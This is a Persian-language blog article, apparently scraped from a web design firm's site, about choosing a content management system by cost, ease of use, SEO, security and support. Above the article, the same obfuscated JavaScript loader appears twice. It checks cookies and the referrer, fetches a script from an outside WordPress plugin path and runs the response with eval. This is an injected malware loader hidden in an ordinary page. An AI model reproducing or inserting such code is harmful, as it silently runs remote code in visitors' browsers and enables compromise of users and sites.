;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} ;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

چگونه یک CMS را برای وب سایت خود انتخاب کنید

داشتن یک تجارت بدون وب سایت مانند شما است که حتی وجود ندارد. این یک واقعیت برای مدتی است که وجود دارد و ما به اهمیت داشتن یک وب سایت نخواهیم پرداخت. با این حال ، اگر صاحب یک شرکت کوچک و متوسط ​​هستید ،شانس این است که احتمالاً شما یک دارایی کافی برای یک بخش فناوری اطلاعات برای فعالیت در وب سایت خود در طول سال نداشته باشید.

در چنین مواردی ، شما باید یک آژانس طراحی وب را استخدام کنید تا طراحی و توسعه وب سایت را برای شما انجام دهد. وقتی یک نفر را استخدام می کنید ، احتمالاً از شما می خواهند بین وب سایت سفارشی و یک سیستم مدیریت محتوا (CMS) تصمیم بگیرید.

از آنجا که شما احتمالاً نحوه رمزگذاری را نمی دانید ، استفاده از CMS راه حل مناسبی برای شما خواهد بود. CMS ها مزایای زیادی را ارائه می دهند و بزرگترین آنها قطعاً ندانستن نحوه رمزگذاری است ، اما هنوز هم قادر به اضافه کردن یا حذف محتوا به وب سایت خود هستید.

از طرف دیگر ، اگر از برنامه نویسان بپرسید که CMS از چه مواردی استفاده کنند ، جواب بسیاری از آنها مشابه است: از CMS استفاده نکنید. اگرچه وب سایت های سفارشی مزایای خود را دارند ، برای افرادی که چیزی در مورد برنامه نویسی نمی دانند – داشتن یک سیستم مدیریت محتوا یک هدیه است.

اما CMS های مختلف زیادی در بازار وجود دارد ، بنابراین چگونه می دانیم چه چیزی را انتخاب کنیم؟ ما می توانیم کمک کنیم

5 پرسش برای کمک به شما جستجو خود را پایین می آورید
صدها سیستم مدیریت محتوا در خارج وجود دارد ، مانند Magento ، دروپال ، جوملا ، وردپرس ، Wix و لیست ادامه دارد. برای یک غیر برنامه نویس ، اینها فقط اسامی هستند که به معنای هیچ چیزی نیستند ، بنابراین باید از طرف مقابل به این مشکل بپردازیم.

قبل از انتخاب CMS ، باید از خودتان چند سوال بپرسید ، مانند بودجه ، پشتیبانی ، گزینه های امنیتی ، دقیقاً آنچه در یک وب سایت نیاز دارید و غیره. انتخاب یک وب سایت در درجه اول بستگی به نوع وب سایت مورد نظر شما دارد. ایجاد: یک وب سایت ، نمونه کارها ، وبلاگ و غیره

پیچیدگی آنها مسئله دیگری است ، به عنوان مثال ، اگر شما یک فروشگاه با صدها یا هزاران محصول را راه اندازی می کنید ، ممکن است بخواهید یک بستر وب اثبات شده اثبات شده مانند WooCommerce یا Magento را انتخاب کنید ، که خود را به داشتن بهترین گزینه های خرید آنلاین ترجیح می دهند.

از طرف دیگر ، اگر یک استارتاپ یا یک شرکت کوچک هستید که یک یا دو سرویس ارائه می دهد ، می توانید به سادگی با یک وب سایت یک صفحه شروع کنید.

شماره 1 هزینه
بودجه شما اولین چیزی است که انتخاب شما از CMS را مشخص می کند.

مهم نیست که شما یک شرکت نوپا یا یک شرکت بزرگ باشید ، باید تعیین کنید که آیا قصد پرداخت CMS را دارید یا نه.

البته بسیاری از CMS های رایگان در آنجا وجود دارد ، مانند WordPress ، Joomla، Drupal، Wix، Typo3، Squarespace، Magento، PrestaShop، OpenCart و اینها معمولاً پلتفرم های منبع باز هستند و این بدان معنی است که آنها توسعه یافته و نگهداری می شوند توسط اعضای جامعه آنها ، کاملاً رایگان

از طرف دیگر ، اگر در حال ایجاد یک پلتفرم بزرگ تجارت الکترونیکی هستید ، اینها معمولاً در بسته های ممتاز مانند Shopify وارد می شوند ، که هزینه آن از 9-299 دلار در ماه است یا BigCommerce که پس از یک نسخه آزمایشی 15 روزه بسته های استاندارد را ارائه می دهد ، از 30 تا 250 دلار و غیره

شماره 2 آسان استفاده کنید

برای یک فرد غیر IT ، سهولت استفاده احتمالاً مهمترین چیزی است که باید در CMS در مورد آن فکر کنید.

اگر می خواهید محتوا را به صورت دستی بارگذاری کنید ، مجبور خواهید بود این کار را خودتان انجام دهید ، خواه بخواهید یا نه. این که آیا شما قبلاً یک وب سایت را مدیریت کرده اید یا خیر ، مواردی وجود دارد که باید آموخته شود و هرچه از این سکو راحت تر استفاده شود ، برای شما یا کارمندانتان بهتر خواهد بود.

امروزه اکثر سیستم عامل های وب مدرن استفاده از آنها کار دشواری نیستند ، بنابراین احتمالاً اضافه کردن صفحات ، تصاویر و سایر محتوا را بر روی وب سایت یا وبلاگ خود آسان نخواهید داشت ، مهم نیست که CMS محبوب را انتخاب کنید. در حال حاضر محبوب ترین CMS وردپرس است که 30٪ وب سایت ها از این پلتفرم در بازار حاکم هستند.

# 3 جستجوگرها
SEO یک کلمه کلیدی برای یک دهه گذشته است. و با دلیل خوب بنابراین ، اگر می خواهید وب سایت شما توسط مشتریان آینده نگر در Google به راحتی پیدا شود ، باید به بهینه سازی موتور جستجو توجه کنید.

از آنجا که 80٪ از ترافیک وب سایت از طریق موتورهای جستجو صورت می گیرد ، می خواهید آنها وب سایت خود را به راحتی خزیده و صفحه های خود را فهرست بندی کنند. ساختار وب سایت ، URL های زیبا ، توضیحات متا ، کد معتبر و مهمتر از همه محتوای با کیفیت ، مواردی هستند که CMS شما باید داشته باشد.

بنابراین ، به وب سایتی که این موارد را تعریف می کند ، مراجعه کنید بدون اینکه مجبور باشید تمام شب به آنها فکر کنید. فقط آن را آسان کنید و به دنبال جوملا ، دروپال ، وردپرس و موارد مشابه باشید.

امنیت شماره 4
امنیت آنلاین همیشه مهم بوده است ، خصوصاً امروز که ما در مورد فروش اطلاعات شخصی با ارزش و تأثیرگذاری آینده GDPR در اتحادیه اروپا (و قابل اجرا در کل جهان) می شنویم. نکته قابل توجه این است که CMS شما باید ضد هکر و در برابر انواع دیگر جرایم سایبری مقاوم باشد ، بنابراین قبل از انتخاب یک مورد ، ابتدا باید تحقیق کاملی انجام دهید.

امروزه اکثر سیستم های مدیریت محتوای مدرن به خوبی در راه ارتقاء امنیت آنلاین خود هستند. به عنوان مثال ، وردپرس ، که بیشترین کاربرد CMS را دارد ، به دلیل محبوبیت زیادی که دارد ، در طی سالیان متمادی برای بهبود پلتفرم خود انجام داده است. تصور کنید بیش از یک میلیون وب سایت در WP اجرا شده اند که به دلیل CMS دارای مشکل سئو هستند … هیچ کس دوباره از آن استفاده نمی کند ، مگر نه؟ از طرف دیگر ، سیستم عاملهای CMS مانند Magento را داریم که احتمالاً بهترین دیدگاه برای وب فروشگاهها ، حداقل از نظر (SEO) ما است.

شماره 5 پشتیبانی فنی
و سرانجام ، آخرین مورد موجود در لیست ما ، اما کمترین اطمینان را نیز در صورت پشتیبانی فنی در اختیار شما قرار نمی دهد. شما باید بدانید که آیا CMS مورد نظر شما دارای کلیه ویژگی های مورد نیاز شماست یا اینکه دارای افزونه ها یا سایر افزونه های دیگری است تا بتواند به راحتی اجرا شود.

علاوه بر این ، شما به یک سیستم مدیریت محتوا نیاز دارید که مرتباً به روز می شود و در تمام طول سال پشتیبانی زنده 24/7 را ارائه می دهد – با یک ایمیل عمومی یا حتی با شماره تلفن شما می توانید برای صحبت با یک شخص واقعی شماره گیری کنید تا در حل مشکلاتتان کمک کند یا در حداقل در یک بازه زمانی معقول پاسخ دهید.

و انتخاب مناسب شرکت من چیست؟
در پایان ، از آنجا که صدها سیستم مدیریت محتوا در آنجا وجود دارد و رقابت سخت است ، شاید تصمیم گیری برای خودتان دشوار باشد. همیشه می توانید با توسعه دهندگان خود تماس بگیرید و ببینید CMS چه پیشنهادی را ارائه می دهند. اگر از ما سؤال کنید ، توسعه دهندگان ما می گویند WordPress: تاکنون ثابت شده است که بهترین نوع خود است و همه دیگران را پشت سر می گذارد. از طرف دیگر ، اگر می خواهید یک فروشگاه اینترنتی ایجاد کنید ، Magento بالاترین توصیه ما را می کند. وب سایتی بسازید که کاربرد آن آسان باشد ، نقاط قوت و ضعف آن را بیاموزید ، یکی از آنها را پیدا کنید که بیشترین شانس رتبه برتر را در Google داشته باشد و دانه های سخت کار خود را درو کنید.

 

 

مقاله های بیشتر

طراحی وب

فریم ورک چیست ؟

فریم ورک FrameWork که در اصطلاح یک چارچوب نرم افزاری گفته می شود مجموعه ای است از کتابخانه های برنامه نویسی و احتمالا مجموعه ای